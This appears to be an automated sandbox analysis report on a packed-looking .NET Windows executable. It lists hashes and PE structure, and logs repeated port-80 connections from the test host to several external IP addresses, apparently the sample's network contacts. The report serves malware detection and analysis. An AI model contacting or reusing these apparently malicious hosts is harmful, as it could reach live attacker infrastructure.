                                                                                                                          SHA256:98ffb783354435168540dc2e8eb4570f865f324169d553ffbad828bf9f33acd3
                                                                                                                          SHA512:2ccd733e9b818cfdd743f5ff98d916af84dade336da3e2c059620fa0326b6ee272576c29d419a083306c56d5327f315568e0cf1cc846b7f3c2d760cce11c3e5c
                                                                                                                          SSDEEP:12288:0rFK4A9bVRf/7XiMvJgMnEjH5k4yOphkjhQBlcYOcxVvs9d2NORdkYqUuU6:GFKV17XRgMnEjZwckYFPVv2dNRdkY76
                                                                                                                          TLSH:F3F4016032EC1F25E47EBBF265B4511943B7792A1A31E60E0ECA64EB0773B40CA52F57
                                                                                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....Z?g..............0......$......N.... ........@.. ....................... ............@................................
                                                                                                                          Icon Hash:4fd8dadadacad80f
                                                                                                                          Entrypoint:0x4bba4e
                                                                                                                          Entrypoint Section:.text
                                                                                                                          Digitally signed:false
                                                                                                                          Imagebase:0x400000
                                                                                                                          Subsystem:windows gui
                                                                                                                          Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                          DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                          Time Stamp:0x673F5AAC [Thu Nov 21 16:07:08 2024 UTC]
                                                                                                                          TLS Callbacks:
                                                                                                                          CLR (.Net) Version:
                                                                                                                          OS Version Major:4
                                                                                                                          OS Version Minor:0
                                                                                                                          File Version Major:4
                                                                                                                          File Version Minor:0
                                                                                                                          Subsystem Version Major:4
                                                                                                                          Subsystem Version Minor:0
                                                                                                                          Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                                                                                          Instruction
                                                                                                                          jmp dword ptr [00402000h]
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          NameVirtual AddressVirtual Size Is in Section
                                                                                                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                          IMAGE_DIRECTORY_ENTRY_IMPORT0xbb9fc0x4f.text
                                                                                                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0xbc0000x21c4.rsrc
                                                                                                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0xc00000xc.reloc
                                                                                                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                          IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                                                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                                                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                                          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                          .text0x20000xb9a540xb9c002e251fda3f948f03a6fcb394b8dbb933False0.9117558146870794data7.872500225134944IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                          .rsrc0xbc0000x21c40x2200b6971994355b053dd46fc937a7815c1bFalse0.8576516544117647data7.433260938935609IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                          .reloc0xc00000xc0x20058254d3d947f93323198353b92c95b02False0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                                                          NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                          RT_ICON0xbc1000x1b63PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced0.9516474112109542
                                                                                                                          RT_GROUP_ICON0xbdc740x14data1.05
                                                                                                                          RT_VERSION0xbdc980x32cdata0.43103448275862066
                                                                                                                          RT_MANIFEST0xbdfd40x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347
                                                                                                                          DLLImport
                                                                                                                          mscoree.dll_CorExeMain
                                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                                          Nov 22, 2024 15:11:59.115792036 CET4974380192.168.2.431.186.11.114
                                                                                                                          Nov 22, 2024 15:11:59.235430002 CET804974331.186.11.114192.168.2.4
                                                                                                                          Nov 22, 2024 15:11:59.235620975 CET4974380192.168.2.431.186.11.114
                                                                                                                          Nov 22, 2024 15:11:59.254071951 CET4974380192.168.2.431.186.11.114
                                                                                                                          Nov 22, 2024 15:11:59.373678923 CET804974331.186.11.114192.168.2.4
                                                                                                                          Nov 22, 2024 15:12:00.626995087 CET804974331.186.11.114192.168.2.4
                                                                                                                          Nov 22, 2024 15:12:00.627018929 CET804974331.186.11.114192.168.2.4
                                                                                                                          Nov 22, 2024 15:12:00.627136946 CET804974331.186.11.114192.168.2.4
                                                                                                                          Nov 22, 2024 15:12:00.627198935 CET4974380192.168.2.431.186.11.114
                                                                                                                          Nov 22, 2024 15:12:00.627242088 CET4974380192.168.2.431.186.11.114
                                                                                                                          Nov 22, 2024 15:12:00.631341934 CET4974380192.168.2.431.186.11.114
                                                                                                                          Nov 22, 2024 15:12:00.751281977 CET804974331.186.11.114192.168.2.4
                                                                                                                          Nov 22, 2024 15:12:17.712117910 CET4978480192.168.2.4194.76.119.60
                                                                                                                          Nov 22, 2024 15:12:17.831593037 CET8049784194.76.119.60192.168.2.4
                                                                                                                          Nov 22, 2024 15:12:17.831870079 CET4978480192.168.2.4194.76.119.60
                                                                                                                          Nov 22, 2024 15:12:17.854099989 CET4978480192.168.2.4194.76.119.60
                                                                                                                          Nov 22, 2024 15:12:17.973588943 CET8049784194.76.119.60192.168.2.4
                                                                                                                          Nov 22, 2024 15:12:19.214692116 CET8049784194.76.119.60192.168.2.4
                                                                                                                          Nov 22, 2024 15:12:19.214889050 CET8049784194.76.119.60192.168.2.4
                                                                                                                          Nov 22, 2024 15:12:19.214967966 CET4978480192.168.2.4194.76.119.60
                                                                                                                          Nov 22, 2024 15:12:19.364618063 CET4978480192.168.2.4194.76.119.60
                                                                                                                          Nov 22, 2024 15:12:20.383686066 CET4979080192.168.2.4194.76.119.60
                                                                                                                          Nov 22, 2024 15:12:20.503487110 CET8049790194.76.119.60192.168.2.4
                                                                                                                          Nov 22, 2024 15:12:20.503607035 CET4979080192.168.2.4194.76.119.60
                                                                                                                          Nov 22, 2024 15:12:20.518194914 CET4979080192.168.2.4194.76.119.60
                                                                                                                          Nov 22, 2024 15:12:20.637757063 CET8049790194.76.119.60192.168.2.4
                                                                                                                          Nov 22, 2024 15:12:22.001300097 CET8049790194.76.119.60192.168.2.4
                                                                                                                          Nov 22, 2024 15:12:22.001562119 CET8049790194.76.119.60192.168.2.4
                                                                                                                          Nov 22, 2024 15:12:22.001616001 CET4979080192.168.2.4194.76.119.60
                                                                                                                          Nov 22, 2024 15:12:22.021037102 CET4979080192.168.2.4194.76.119.60
                                                                                                                          Nov 22, 2024 15:12:23.040220022 CET4979680192.168.2.4194.76.119.60
                                                                                                                          Nov 22, 2024 15:12:23.159934044 CET8049796194.76.119.60192.168.2.4
                                                                                                                          Nov 22, 2024 15:12:23.160042048 CET4979680192.168.2.4194.76.119.60
                                                                                                                          Nov 22, 2024 15:12:23.175431967 CET4979680192.168.2.4194.76.119.60
                                                                                                                          Nov 22, 2024 15:12:23.295140982 CET8049796194.76.119.60192.168.2.4
                                                                                                                          Nov 22, 2024 15:12:23.295165062 CET8049796194.76.119.60192.168.2.4
                                                                                                                          Nov 22, 2024 15:12:23.295228958 CET8049796194.76.119.60192.168.2.4
                                                                                                                          Nov 22, 2024 15:12:23.295277119 CET8049796194.76.119.60192.168.2.4
                                                                                                                          Nov 22, 2024 15:12:23.295361042 CET8049796194.76.119.60192.168.2.4
                                                                                                                          Nov 22, 2024 15:12:23.295370102 CET8049796194.76.119.60192.168.2.4
                                                                                                                          Nov 22, 2024 15:12:23.295408964 CET8049796194.76.119.60192.168.2.4
                                                                                                                          Nov 22, 2024 15:12:23.295455933 CET8049796194.76.119.60192.168.2.4
                                                                                                                          Nov 22, 2024 15:12:23.295464993 CET8049796194.76.119.60192.168.2.4
                                                                                                                          Nov 22, 2024 15:12:24.484096050 CET8049796194.76.119.60192.168.2.4
                                                                                                                          Nov 22, 2024 15:12:24.485141039 CET8049796194.76.119.60192.168.2.4
                                                                                                                          Nov 22, 2024 15:12:24.485239029 CET4979680192.168.2.4194.76.119.60
                                                                                                                          Nov 22, 2024 15:12:24.677342892 CET4979680192.168.2.4194.76.119.60
                                                                                                                          Nov 22, 2024 15:12:25.697010994 CET4980280192.168.2.4194.76.119.60
                                                                                                                          Nov 22, 2024 15:12:25.817342043 CET8049802194.76.119.60192.168.2.4
                                                                                                                          Nov 22, 2024 15:12:25.817483902 CET4980280192.168.2.4194.76.119.60
                                                                                                                          Nov 22, 2024 15:12:25.827003956 CET4980280192.168.2.4194.76.119.60
                                                                                                                          Nov 22, 2024 15:12:25.946818113 CET8049802194.76.119.60192.168.2.4
                                                                                                                          Nov 22, 2024 15:12:27.183223009 CET8049802194.76.119.60192.168.2.4
                                                                                                                          Nov 22, 2024 15:12:27.183331966 CET8049802194.76.119.60192.168.2.4
                                                                                                                          Nov 22, 2024 15:12:27.183469057 CET4980280192.168.2.4194.76.119.60
                                                                                                                          Nov 22, 2024 15:12:27.186204910 CET4980280192.168.2.4194.76.119.60
                                                                                                                          Nov 22, 2024 15:12:27.305720091 CET8049802194.76.119.60192.168.2.4
                                                                                                                          Nov 22, 2024 15:12:33.534286976 CET4982380192.168.2.4103.224.182.242
                                                                                                                          Nov 22, 2024 15:12:33.654035091 CET8049823103.224.182.242192.168.2.4
                                                                                                                          Nov 22, 2024 15:12:33.654138088 CET4982380192.168.2.4103.224.182.242
                                                                                                                          Nov 22, 2024 15:12:33.679647923 CET4982380192.168.2.4103.224.182.242
                                                                                                                          Nov 22, 2024 15:12:33.799422026 CET8049823103.224.182.242192.168.2.4
                                                                                                                          Nov 22, 2024 15:12:34.959163904 CET8049823103.224.182.242192.168.2.4
                                                                                                                          Nov 22, 2024 15:12:34.959208012 CET8049823103.224.182.242192.168.2.4
                                                                                                                          Nov 22, 2024 15:12:34.959287882 CET4982380192.168.2.4103.224.182.242
                                                                                                                          Nov 22, 2024 15:12:35.192787886 CET4982380192.168.2.4103.224.182.242
                                                                                                                          Nov 22, 2024 15:12:36.212086916 CET4982980192.168.2.4103.224.182.242
                                                                                                                          Nov 22, 2024 15:12:36.331931114 CET8049829103.224.182.242192.168.2.4
                                                                                                                          Nov 22, 2024 15:12:36.332030058 CET4982980192.168.2.4103.224.182.242
                                                                                                                          Nov 22, 2024 15:12:36.347232103 CET4982980192.168.2.4103.224.182.242
                                                                                                                          Nov 22, 2024 15:12:36.467180014 CET8049829103.224.182.242192.168.2.4
                                                                                                                          Nov 22, 2024 15:12:37.663254976 CET8049829103.224.182.242192.168.2.4
                                                                                                                          Nov 22, 2024 15:12:37.663292885 CET8049829103.224.182.242192.168.2.4
                                                                                                                          Nov 22, 2024 15:12:37.663434029 CET4982980192.168.2.4103.224.182.242
                                                                                                                          Nov 22, 2024 15:12:37.849196911 CET4982980192.168.2.4103.224.182.242
                                                                                                                          Nov 22, 2024 15:12:38.867929935 CET4983580192.168.2.4103.224.182.242
                                                                                                                          Nov 22, 2024 15:12:38.988390923 CET8049835103.224.182.242192.168.2.4
                                                                                                                          Nov 22, 2024 15:12:38.988538980 CET4983580192.168.2.4103.224.182.242
                                                                                                                          Nov 22, 2024 15:12:39.003422976 CET4983580192.168.2.4103.224.182.242
                                                                                                                          Nov 22, 2024 15:12:39.123063087 CET8049835103.224.182.242192.168.2.4
                                                                                                                          Nov 22, 2024 15:12:39.123137951 CET8049835103.224.182.242192.168.2.4
                                                                                                                          Nov 22, 2024 15:12:39.123171091 CET8049835103.224.182.242192.168.2.4
                                                                                                                          Nov 22, 2024 15:12:39.123222113 CET8049835103.224.182.242192.168.2.4
                                                                                                                          Nov 22, 2024 15:12:39.123249054 CET8049835103.224.182.242192.168.2.4
                                                                                                                          Nov 22, 2024 15:12:39.123492002 CET8049835103.224.182.242192.168.2.4
                                                                                                                          Nov 22, 2024 15:12:39.123519897 CET8049835103.224.182.242192.168.2.4
                                                                                                                          Nov 22, 2024 15:12:39.123601913 CET8049835103.224.182.242192.168.2.4
                                                                                                                          Nov 22, 2024 15:12:39.123671055 CET8049835103.224.182.242192.168.2.4
                                                                                                                          Nov 22, 2024 15:12:40.360388041 CET8049835103.224.182.242192.168.2.4
                                                                                                                          Nov 22, 2024 15:12:40.361037970 CET8049835103.224.182.242192.168.2.4
                                                                                                                          Nov 22, 2024 15:12:40.361098051 CET4983580192.168.2.4103.224.182.242
                                                                                                                          Nov 22, 2024 15:12:40.505384922 CET4983580192.168.2.4103.224.182.242
                                                                                                                          Nov 22, 2024 15:12:41.524022102 CET4984180192.168.2.4103.224.182.242
                                                                                                                          Nov 22, 2024 15:12:41.643620968 CET8049841103.224.182.242192.168.2.4
                                                                                                                          Nov 22, 2024 15:12:41.643811941 CET4984180192.168.2.4103.224.182.242
                                                                                                                          Nov 22, 2024 15:12:41.652867079 CET4984180192.168.2.4103.224.182.242
                                                                                                                          Nov 22, 2024 15:12:41.772468090 CET8049841103.224.182.242192.168.2.4
                                                                                                                          Nov 22, 2024 15:12:42.993855953 CET8049841103.224.182.242192.168.2.4
                                                                                                                          Nov 22, 2024 15:12:42.993959904 CET8049841103.224.182.242192.168.2.4
                                                                                                                          Nov 22, 2024 15:12:42.994158983 CET4984180192.168.2.4103.224.182.242
                                                                                                                          Nov 22, 2024 15:12:42.994314909 CET8049841103.224.182.242192.168.2.4
                                                                                                                          Nov 22, 2024 15:12:42.994376898 CET4984180192.168.2.4103.224.182.242
                                                                                                                          Nov 22, 2024 15:12:42.997267962 CET4984180192.168.2.4103.224.182.242
                                                                                                                          Nov 22, 2024 15:12:43.117230892 CET8049841103.224.182.242192.168.2.4
                                                                                                                          Nov 22, 2024 15:12:48.323390961 CET4985780192.168.2.4104.21.58.90
                                                                                                                          Nov 22, 2024 15:12:48.443496943 CET8049857104.21.58.90192.168.2.4
                                                                                                                          Nov 22, 2024 15:12:48.443629980 CET4985780192.168.2.4104.21.58.90
                                                                                                                          Nov 22, 2024 15:12:48.458190918 CET4985780192.168.2.4104.21.58.90
                                                                                                                          Nov 22, 2024 15:12:48.577954054 CET8049857104.21.58.90192.168.2.4
                                                                                                                          Nov 22, 2024 15:12:49.732104063 CET8049857104.21.58.90192.168.2.4
                                                                                                                          Nov 22, 2024 15:12:49.732702017 CET8049857104.21.58.90192.168.2.4
                                                                                                                          Nov 22, 2024 15:12:49.732780933 CET4985780192.168.2.4104.21.58.90
                                                                                                                          Nov 22, 2024 15:12:49.974239111 CET4985780192.168.2.4104.21.58.90
                                                                                                                          Nov 22, 2024 15:12:50.993184090 CET4986380192.168.2.4104.21.58.90
                                                                                                                          Nov 22, 2024 15:12:51.112900972 CET8049863104.21.58.90192.168.2.4
                                                                                                                          Nov 22, 2024 15:12:51.112989902 CET4986380192.168.2.4104.21.58.90
                                                                                                                          Nov 22, 2024 15:12:51.127619028 CET4986380192.168.2.4104.21.58.90
                                                                                                                          Nov 22, 2024 15:12:51.247972012 CET8049863104.21.58.90192.168.2.4
                                                                                                                          Nov 22, 2024 15:12:52.362478018 CET8049863104.21.58.90192.168.2.4
                                                                                                                          Nov 22, 2024 15:12:52.366300106 CET8049863104.21.58.90192.168.2.4
                                                                                                                          Nov 22, 2024 15:12:52.366380930 CET4986380192.168.2.4104.21.58.90
                                                                                                                          Nov 22, 2024 15:12:52.630618095 CET4986380192.168.2.4104.21.58.90
                                                                                                                          Nov 22, 2024 15:12:53.649856091 CET4987180192.168.2.4104.21.58.90
                                                                                                                          Nov 22, 2024 15:12:53.769484997 CET8049871104.21.58.90192.168.2.4
                                                                                                                          Nov 22, 2024 15:12:53.769598007 CET4987180192.168.2.4104.21.58.90
                                                                                                                          Nov 22, 2024 15:12:53.785161018 CET4987180192.168.2.4104.21.58.90
                                                                                                                          Nov 22, 2024 15:12:53.905441999 CET8049871104.21.58.90192.168.2.4
                                                                                                                          Nov 22, 2024 15:12:53.905630112 CET8049871104.21.58.90192.168.2.4
                                                                                                                          Nov 22, 2024 15:12:53.905781031 CET8049871104.21.58.90192.168.2.4
                                                                                                                          Nov 22, 2024 15:12:53.905790091 CET8049871104.21.58.90192.168.2.4
                                                                                                                          Nov 22, 2024 15:12:53.905927896 CET8049871104.21.58.90192.168.2.4
                                                                                                                          Nov 22, 2024 15:12:53.905936956 CET8049871104.21.58.90192.168.2.4
                                                                                                                          Nov 22, 2024 15:12:53.906038046 CET8049871104.21.58.90192.168.2.4
                                                                                                                          Nov 22, 2024 15:12:53.906048059 CET8049871104.21.58.90192.168.2.4
                                                                                                                          Nov 22, 2024 15:12:53.906126976 CET8049871104.21.58.90192.168.2.4
                                                                                                                          Nov 22, 2024 15:12:54.955177069 CET8049871104.21.58.90192.168.2.4
                                                                                                                          Nov 22, 2024 15:12:54.955943108 CET8049871104.21.58.90192.168.2.4
                                                                                                                          Nov 22, 2024 15:12:54.955991983 CET4987180192.168.2.4104.21.58.90
                                                                                                                          Nov 22, 2024 15:12:55.286717892 CET4987180192.168.2.4104.21.58.90
                                                                                                                          Nov 22, 2024 15:12:56.306596994 CET4987980192.168.2.4104.21.58.90
                                                                                                                          Nov 22, 2024 15:12:56.426214933 CET8049879104.21.58.90192.168.2.4
                                                                                                                          Nov 22, 2024 15:12:56.426306963 CET4987980192.168.2.4104.21.58.90
                                                                                                                          Nov 22, 2024 15:12:56.517148018 CET4987980192.168.2.4104.21.58.90
                                                                                                                          Nov 22, 2024 15:12:56.636710882 CET8049879104.21.58.90192.168.2.4
                                                                                                                          Nov 22, 2024 15:12:57.712625027 CET8049879104.21.58.90192.168.2.4
                                                                                                                          Nov 22, 2024 15:12:57.712666035 CET8049879104.21.58.90192.168.2.4
                                                                                                                          Nov 22, 2024 15:12:57.712930918 CET4987980192.168.2.4104.21.58.90
                                                                                                                          Nov 22, 2024 15:12:57.712982893 CET8049879104.21.58.90192.168.2.4
                                                                                                                          Nov 22, 2024 15:12:57.713272095 CET8049879104.21.58.90192.168.2.4
                                                                                                                          Nov 22, 2024 15:12:57.716269016 CET4987980192.168.2.4104.21.58.90
                                                                                                                          Nov 22, 2024 15:12:57.720429897 CET4987980192.168.2.4104.21.58.90
                                                                                                                          Nov 22, 2024 15:12:57.839914083 CET8049879104.21.58.90192.168.2.4
                                                                                                                          Nov 22, 2024 15:13:03.228895903 CET4989380192.168.2.43.33.130.190
                                                                                                                          Nov 22, 2024 15:13:03.348742962 CET80498933.33.130.190192.168.2.4
                                                                                                                          Nov 22, 2024 15:13:03.350301981 CET4989380192.168.2.43.33.130.190
                                                                                                                          Nov 22, 2024 15:13:03.368961096 CET4989380192.168.2.43.33.130.190
                                                                                                                          Nov 22, 2024 15:13:03.488748074 CET80498933.33.130.190192.168.2.4
                                                                                                                          Nov 22, 2024 15:13:04.550486088 CET80498933.33.130.190192.168.2.4
                                                                                                                          Nov 22, 2024 15:13:04.550544977 CET4989380192.168.2.43.33.130.190
                                                                                                                          Nov 22, 2024 15:13:04.880876064 CET4989380192.168.2.43.33.130.190
                                                                                                                          Nov 22, 2024 15:13:05.000432014 CET80498933.33.130.190192.168.2.4
                                                                                                                          Nov 22, 2024 15:13:05.902200937 CET4990280192.168.2.43.33.130.190
                                                                                                                          Nov 22, 2024 15:13:06.021992922 CET80499023.33.130.190192.168.2.4
                                                                                                                          Nov 22, 2024 15:13:06.022250891 CET4990280192.168.2.43.33.130.190
                                                                                                                          Nov 22, 2024 15:13:06.038191080 CET4990280192.168.2.43.33.130.190
                                                                                                                          Nov 22, 2024 15:13:06.157840014 CET80499023.33.130.190192.168.2.4
                                                                                                                          Nov 22, 2024 15:13:07.210397959 CET80499023.33.130.190192.168.2.4
                                                                                                                          Nov 22, 2024 15:13:07.214457989 CET4990280192.168.2.43.33.130.190
                                                                                                                          Nov 22, 2024 15:13:07.554419994 CET4990280192.168.2.43.33.130.190
                                                                                                                          Nov 22, 2024 15:13:07.674015045 CET80499023.33.130.190192.168.2.4
                                                                                                                          Nov 22, 2024 15:13:08.571881056 CET4990880192.168.2.43.33.130.190
                                                                                                                          Nov 22, 2024 15:13:08.691836119 CET80499083.33.130.190192.168.2.4
                                                                                                                          Nov 22, 2024 15:13:08.691940069 CET4990880192.168.2.43.33.130.190
                                                                                                                          Nov 22, 2024 15:13:08.709234953 CET4990880192.168.2.43.33.130.190
                                                                                                                          Nov 22, 2024 15:13:08.829104900 CET80499083.33.130.190192.168.2.4
                                                                                                                          Nov 22, 2024 15:13:08.829132080 CET80499083.33.130.190192.168.2.4
                                                                                                                          Nov 22, 2024 15:13:08.829204082 CET80499083.33.130.190192.168.2.4
                                                                                                                          Nov 22, 2024 15:13:08.829217911 CET80499083.33.130.190192.168.2.4
                                                                                                                          Nov 22, 2024 15:13:08.829243898 CET80499083.33.130.190192.168.2.4
                                                                                                                          Nov 22, 2024 15:13:08.829258919 CET80499083.33.130.190192.168.2.4
                                                                                                                          Nov 22, 2024 15:13:08.829391003 CET80499083.33.130.190192.168.2.4
                                                                                                                          Nov 22, 2024 15:13:08.829405069 CET80499083.33.130.190192.168.2.4
                                                                                                                          Nov 22, 2024 15:13:08.829418898 CET80499083.33.130.190192.168.2.4
                                                                                                                          Nov 22, 2024 15:13:09.838428020 CET80499083.33.130.190192.168.2.4
                                                                                                                          Nov 22, 2024 15:13:09.838730097 CET4990880192.168.2.43.33.130.190
                                                                                                                          Nov 22, 2024 15:13:10.224404097 CET4990880192.168.2.43.33.130.190
                                                                                                                          Nov 22, 2024 15:13:10.344780922 CET80499083.33.130.190192.168.2.4
                                                                                                                          Nov 22, 2024 15:13:11.246210098 CET4991480192.168.2.43.33.130.190
                                                                                                                          Nov 22, 2024 15:13:11.365820885 CET80499143.33.130.190192.168.2.4
                                                                                                                          Nov 22, 2024 15:13:11.366064072 CET4991480192.168.2.43.33.130.190
                                                                                                                          Nov 22, 2024 15:13:11.377552986 CET4991480192.168.2.43.33.130.190
                                                                                                                          Nov 22, 2024 15:13:11.497071981 CET80499143.33.130.190192.168.2.4
                                                                                                                          Nov 22, 2024 15:13:12.517416954 CET80499143.33.130.190192.168.2.4
                                                                                                                          Nov 22, 2024 15:13:12.518121958 CET80499143.33.130.190192.168.2.4
                                                                                                                          Nov 22, 2024 15:13:12.518189907 CET4991480192.168.2.43.33.130.190
                                                                                                                          Nov 22, 2024 15:13:12.521348953 CET4991480192.168.2.43.33.130.190
                                                                                                                          Nov 22, 2024 15:13:12.641017914 CET80499143.33.130.190192.168.2.4
                                                                                                                          Nov 22, 2024 15:13:18.075335026 CET4993080192.168.2.4161.97.142.144
                                                                                                                          Nov 22, 2024 15:13:18.195732117 CET8049930161.97.142.144192.168.2.4
                                                                                                                          Nov 22, 2024 15:13:18.195815086 CET4993080192.168.2.4161.97.142.144
                                                                                                                          Nov 22, 2024 15:13:18.212018967 CET4993080192.168.2.4161.97.142.144
                                                                                                                          Nov 22, 2024 15:13:18.331820965 CET8049930161.97.142.144192.168.2.4
                                                                                                                          Nov 22, 2024 15:13:19.533786058 CET8049930161.97.142.144192.168.2.4
                                                                                                                          Nov 22, 2024 15:13:19.533951044 CET8049930161.97.142.144192.168.2.4
                                                                                                                          Nov 22, 2024 15:13:19.533983946 CET8049930161.97.142.144192.168.2.4
                                                                                                                          Nov 22, 2024 15:13:19.534020901 CET4993080192.168.2.4161.97.142.144
                                                                                                                          Nov 22, 2024 15:13:19.534121990 CET4993080192.168.2.4161.97.142.144
                                                                                                                          Nov 22, 2024 15:13:19.724404097 CET4993080192.168.2.4161.97.142.144
                                                                                                                          Nov 22, 2024 15:13:20.744273901 CET4993680192.168.2.4161.97.142.144
                                                                                                                          Nov 22, 2024 15:13:20.863791943 CET8049936161.97.142.144192.168.2.4
                                                                                                                          Nov 22, 2024 15:13:20.863878965 CET4993680192.168.2.4161.97.142.144
                                                                                                                          Nov 22, 2024 15:13:20.880209923 CET4993680192.168.2.4161.97.142.144
                                                                                                                          Nov 22, 2024 15:13:20.999783039 CET8049936161.97.142.144192.168.2.4
                                                                                                                          Nov 22, 2024 15:13:22.157048941 CET8049936161.97.142.144192.168.2.4
                                                                                                                          Nov 22, 2024 15:13:22.157167912 CET8049936161.97.142.144192.168.2.4
                                                                                                                          Nov 22, 2024 15:13:22.157183886 CET8049936161.97.142.144192.168.2.4
                                                                                                                          Nov 22, 2024 15:13:22.157262087 CET4993680192.168.2.4161.97.142.144
                                                                                                                          Nov 22, 2024 15:13:22.396472931 CET4993680192.168.2.4161.97.142.144
                                                                                                                          Nov 22, 2024 15:13:23.416342974 CET4994480192.168.2.4161.97.142.144
                                                                                                                          Nov 22, 2024 15:13:23.535967112 CET8049944161.97.142.144192.168.2.4
                                                                                                                          Nov 22, 2024 15:13:23.536865950 CET4994480192.168.2.4161.97.142.144
                                                                                                                          Nov 22, 2024 15:13:23.551826000 CET4994480192.168.2.4161.97.142.144
                                                                                                                          Nov 22, 2024 15:13:23.671938896 CET8049944161.97.142.144192.168.2.4
                                                                                                                          Nov 22, 2024 15:13:23.671963930 CET8049944161.97.142.144192.168.2.4
